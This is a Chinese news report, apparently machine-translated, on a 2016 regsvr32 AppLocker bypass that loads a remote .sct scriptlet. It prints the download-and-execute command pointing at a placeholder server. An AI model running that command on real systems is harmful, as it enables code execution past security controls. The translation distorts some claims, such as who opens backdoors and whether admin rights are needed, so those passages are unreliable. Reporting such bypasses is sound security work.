新闻链接：http://news.softpedia.com/news/windows-applocker-bypass-allows-attackers-to-registers-dlls-off-the-internet-503289.shtml
新闻时间：2016年4月22日
新闻正文：

攻击者从互联网绕过 Windows AppLocker允许注册dll  不需要管理员权限运行攻击

黑客可以绕过微软的Windows AppLocker安全特性被滥用的一个隐藏的特征的Regsvr32命令行实用程序通常用于注册dll在Windows电脑。

AppLocker 是一个安全特性介绍了Windows 7和Windows Server 2008 R2,帮助管理员指定允许哪些用户或用户组访问和文件在文件的基础上运行。

Regsvr32 是一个脚本可以使用实用程序安装或批处理脚本快速注册一个DLL。 你会想象,微软已经培养了这样一种危险的工具,以防止滥用职权允许管理员权限运行。
"检测到攻击是不可能的 "

根据安全研究员 凯西史密斯 ,攻击者立足感染Windows工作站上可以滥用Regsvr32下载一个COM的脚本(。 sct文件)从网上和运行在本地机器上注册一个DLL。

攻击者不需要管理员权限,Regsvr32代理注意,可以使用TLS内容,遵循重定向,和最重要的是,签署了证书,使所有命令看起来像普通Windows后台活动。

下面是标准Regsvr32语法和恶意命令的版本:

regsvr32 [/s] [/n] [/i[:cmdline]] dllname
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

"Regsvr32特性没有文字记录 "

“这不是regsvr32有据可查。 exe可以接受一个脚本的url,”史密斯还说。 “为了触发这个旁路,将代码块,VB或者JS内部元素。”

为进一步测试,研究者也发表了四 概念验证脚本 GitHub,系统管理员可以通过Regsvr32装载和打开后门或通过HTTP反向壳。

理论上,这些类型的利用将允许黑客访问寄存器dll,然后在被感染的计算机上执行恶意代码,甚至用管理员权限

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课